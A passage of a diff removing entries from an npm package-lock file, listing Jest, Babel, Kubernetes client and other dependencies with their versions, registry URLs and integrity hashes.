"sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", - "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", - "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - } - }, - "@nodelib/fs.scandir": { - "version": "2.1.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", - "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", - "dev": true, - "peer": true, - "requires": { - "@nodelib/fs.stat": "2.0.5", - "run-parallel": "^1.1.9" - } - }, - "@nodelib/fs.stat": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", - "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", - "dev": true, - "peer": true - }, - "@nodelib/fs.walk": { - "version": "1.2.8", - "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", - "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", - "dev": true, - "peer": true, - "requires": { - "@nodelib/fs.scandir": "2.1.5", - "fastq": "^1.6.0" - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", - "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.3.tgz", - "integrity": "sha512-NQn7AHQnk/RSLOxrBbGyJM/aVQ+pjj5HCgasFxc0K/KhoATfQ/47AyUl15I2yBUpihjmas+a+VJBOqecrFH+uA==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", - "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "@types/stack-utils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", - "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.33", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", - "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.3", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.3.tgz", - "integrity": "sha512-I4q9QU9MQv4oEOz4tAHJtNz1cwuLxn2F3xcc2iV5WdqLPpUnj30aUuxt1mAxYTG+oe8CZMV/+6rU4S4gRDzqtQ==", - "dev": true - }, - "acorn": { - "version": "8.9.0", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.9.0.tgz", - "integrity": "sha512-jaVNAFBHNLXspO543WnNNPZFRtavh3skAkITqD0/2aeMkKZTN+254PyhwxFYrk3vQ1xfY+2wbesJMs/JC8/PwQ==", - "dev": true, - "peer": true - }, - "acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "requires": {} - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - }, - "dependencies": { - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - } - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.9.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", - "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": 